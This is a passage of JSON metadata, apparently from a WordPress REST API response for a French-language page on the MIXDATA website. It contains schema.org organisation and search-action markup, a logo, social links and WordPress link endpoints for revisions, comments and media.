Marketing.","publisher":{"@id":"https:\/\/www.mixdata.com\/fr\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.mixdata.com\/fr\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"fr-FR"},{"@type":"Organization","@id":"https:\/\/www.mixdata.com\/fr\/#organization","name":"MIXDATA","url":"https:\/\/www.mixdata.com\/fr\/","logo":{"@type":"ImageObject","inLanguage":"fr-FR","@id":"https:\/\/www.mixdata.com\/fr\/#\/schema\/logo\/image\/","url":"https:\/\/www.mixdata.com\/fr\/wp-content\/uploads\/2019\/03\/mixdata-logo-100p-e1552399152569.png","contentUrl":"https:\/\/www.mixdata.com\/fr\/wp-content\/uploads\/2019\/03\/mixdata-logo-100p-e1552399152569.png","width":80,"height":26,"caption":"MIXDATA"},"image":{"@id":"https:\/\/www.mixdata.com\/fr\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/x.com\/mixdata92","https:\/\/www.linkedin.com\/company\/mixdata\/"]}]}},"_links":{"self":[{"href":"https:\/\/www.mixdata.com\/fr\/wp-json\/wp\/v2\/pages\/1585","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.mixdata.com\/fr\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.mixdata.com\/fr\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.mixdata.com\/fr\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.mixdata.com\/fr\/wp-json\/wp\/v2\/comments?post=1585"}],"version-history":[{"count":19,"href":"https:\/\/www.mixdata.com\/fr\/wp-json\/wp\/v2\/pages\/1585\/revisions"}],"predecessor-version":[{"id":2471,"href":"https:\/\/www.mixdata.com\/fr\/wp-json\/wp\/v2\/pages\/1585\/revisions\/2471"}],"wp:attachment":[{"href":"https:\/\/www.mixdata.com\/fr\/wp-json\/wp\/v2\/media?parent=1585"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}